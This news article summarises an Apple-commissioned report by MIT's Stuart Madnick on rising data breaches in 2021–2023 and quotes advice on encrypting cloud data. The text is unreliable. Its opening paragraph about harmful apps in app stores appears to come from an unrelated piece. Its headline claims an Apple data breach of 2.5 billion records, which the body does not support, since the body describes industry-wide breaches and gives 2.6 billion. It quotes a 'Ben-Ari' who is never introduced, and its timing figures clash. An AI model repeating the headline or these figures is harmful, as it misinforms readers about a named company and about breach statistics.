The recent discovery of harmful apps penetrating well-known app stores is a sobering reminder of the constant dangers of the digital world. Users need to prioritize their online security and stay alert. In an increasingly connected world, it is critical to regularly review installed apps, remain aware of potential threats, and keep device security settings up to date.



Apple's Alarming Data Breach: 2.5 Billion Records at Risk

 


Earlier this week, a report commissioned by Apple highlighted, yet again, why end-to-end encryption must be used when protecting sensitive data against theft and misuse, and why analysts have long recommended it. 

The report is an independent review of publicly reported breaches, conducted for Apple by Massachusetts Institute of Technology professor Stuart Madnick. It found that ransomware campaigns and attacks on trusted technology vendors over the past two years have driven a dramatic increase both in the number of data breaches and in the number of records compromised.

Across 2021 and 2022, 2.6 billion personal records were exposed, 1.5 billion of them in 2022 alone, and the trends so far this year make it highly likely that the 2023 total will be higher still.

The first nine months of 2023 alone saw 20% more data breaches than all of 2022 combined. By the end of August 2023, an estimated 360 million sensitive records had been exposed through breaches at corporations and institutions.

Studies cited in the Apple report, among them IBM's Cost of a Data Breach study and a Forrester survey, found that 95% of organizations that suffered a recent breach had experienced at least one breach before.

Seventy-five per cent of respondents had experienced at least one data-compromise incident within the previous 12 months, and 98% of companies currently have a relationship with a technology vendor that has itself suffered at least one recent data breach.

Breaches involving vendor technologies, including those at Fortra, 3CX, Progress Software, and Microsoft, are among the recent examples, and each rippled out to a wide range of downstream organizations and individuals. When planning encryption, organizations should also account for the rapid growth and adoption of cloud computing.

Data analyzed in Apple's study showed that over 80% of breaches involved cloud-stored data, and encrypting data in the cloud can be harder than encrypting it on premises. Ken Dunham, director of cyber threats at Qualys, says organizations with good security practices usually have a good level of visibility over their legacy networks.

"Nevertheless, if they migrate to the cloud, they often lose the ability to control, see, manage, and operate in a way that is similar to what they had in place in the past when it comes to encryption," he says. He adds that maintaining a hybrid network that combines legacy and modern technologies adds a layer of complexity when organizations embark on digital transformation initiatives.

Relying on the cloud provider as the primary source of data encryption can be a mistake, says Ben-Ari: "While cloud providers offer valuable security measures, it is the organizations' responsibility to ensure that they encrypt their data." He also recommends that organizations prioritize technologies that are user-friendly and easy to implement, phasing them in so that disruption to existing operations is minimized.

His final recommendation is that organizations make use of the shared responsibility model that many cloud providers and leading SaaS vendors offer, which lets them bring a wide range of advanced encryption features to their users with a single click from the browser.